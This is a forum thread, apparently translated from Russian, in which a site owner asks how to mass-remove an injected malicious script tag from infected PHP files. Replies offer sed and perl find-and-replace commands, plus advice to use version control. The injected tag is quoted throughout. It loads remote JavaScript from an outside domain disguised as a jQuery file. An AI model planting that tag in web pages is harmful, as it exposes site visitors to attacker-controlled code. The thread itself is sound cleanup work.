Answer the question
In order to leave comments, you need to log in
M
M
makecode2013-05-22 10:25:54
makecode, 2013-05-22 10:25:54
Help build a team
Good afternoon!
Please help me make a team. There's a backdoor somewhere on the server or something. Infected .php files that have a body element.
Found a command to replace, but I can't replace the whole structure.
Вот эту "<script language="JavaScript" src="http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js" type="text/javascript"></script>"
find . -name '*.php' -print | xargs perl -pi -e's/ЧТО_ИСКАТЬ/ЧЕМ_ЗАМЕНИТЬ/ig' *.php
find . -name '*.php' -print | xargs perl -pi -e's/<script language="JavaScript" src="http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js" type="text/javascript"></script>/ /ig' *.php
Writes
Bareword found where operator expected at -e line 1, near "s/<script language="JavaScript" src="http://xxxindianxxx"
String found where operator expected at -e line 1, near "js" type=""
Bareword found where operator expected at -e line 1, near "" type="text"
(Missing operator before text?)
String found where operator expected at -e line 1, at end of line
(Missing semicolon on previous line?)
syntax error at -e line 1, near "s/<script language="JavaScript" src="http://xxxindianxxx"
Can't find string terminator '"' anywhere before EOF at -e line 1.
As far as I understand, it is necessary to either escape quotes or spaces, but I don’t know how.
Thanks a lot for any answer!
8 answer(s)
@BuriK666
@HighQuality
@sdevalex
@ivnik
@jcmvbkbc
@mekegi
@shambler81
A
Andrey Burov, 2013-05-22 @BuriK666
Can i
find . -name '*.php' -exec sed -i 's#<script language="JavaScript" src="http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js" type="text/javascript"></script># #ig' {} \;
A
Artur Bordenyuk, 2013-05-22 @HighQuality
You can also run a php script. Traverse all files recursively? No problem.
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator('/path/to/project'), RecursiveIteratorIterator::CHILD_FIRST);
foreach( $iterator as $item ) {
if( $item->isFile() ) {
// ... ты знаешь что делать :D
}
}
S
sdevalex, 2013-05-22 @sdevalex
It is necessary to escape service characters like "/" and "." (see perldoc.perl.org/perlre.html#Metacharacters for everything in the documentation ).
s/<script language="JavaScript" src="http:\/\/xxxindianxxx.com\/st\/css\/jquery-1.6.5\.min\.js" type="text/javascript"><\/script>//ig
I
ivnik, 2013-05-22 @ivnik
Also, text/javascript must be written as text\/javascript
. Also, you will have problems if there are spaces in the php file names (see man find -exec).
J
jcmvbkbc, 2013-05-22 @jcmvbkbc
find . -name '*.php' -print0 | xargs -0 -i{} sed -i\{} -e's!<script language="JavaScript" src="http://xxxindianxxx.com/st/css/jquery-1.6.5.min.js" type="text/javascript"></script>!!ig'
A
Arsen, 2013-05-23 @mekegi
Every time I read here how people caught Trojans on a server and the methods of treatment for them, it becomes somehow sad.
Well, why look for them through the search for all files? Do you have a version control system? (If not, then it would be time to start)
The code exists in one copy on the server and nowhere else?
If the answer is “yes”, then as soon as you clean this infection with all sorts of crutches and pens, start git, hg or svn and push it to some remote server (fortunately there are a lot of free services with closed repositories), and the next time you will be “hacked »Pull from a remote server and everyone will be happy.
Well, by God, like small children.
V
Victor Taran, 2014-02-07 @shambler81
If you have a problem with escaping special characters at all, abbreviate them or skip them with a regular period, it is unlikely that you still have a mention of this site on your site for valid purposes. Clumsily but very easy to write.
find. -name '*.php' -exec sed -i 's/.script .*.http...xxxindianxxx.com.st.css.*.script../New text
or blank/g' "{}" \ ;
Similar questions
O
M
J
M
A
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question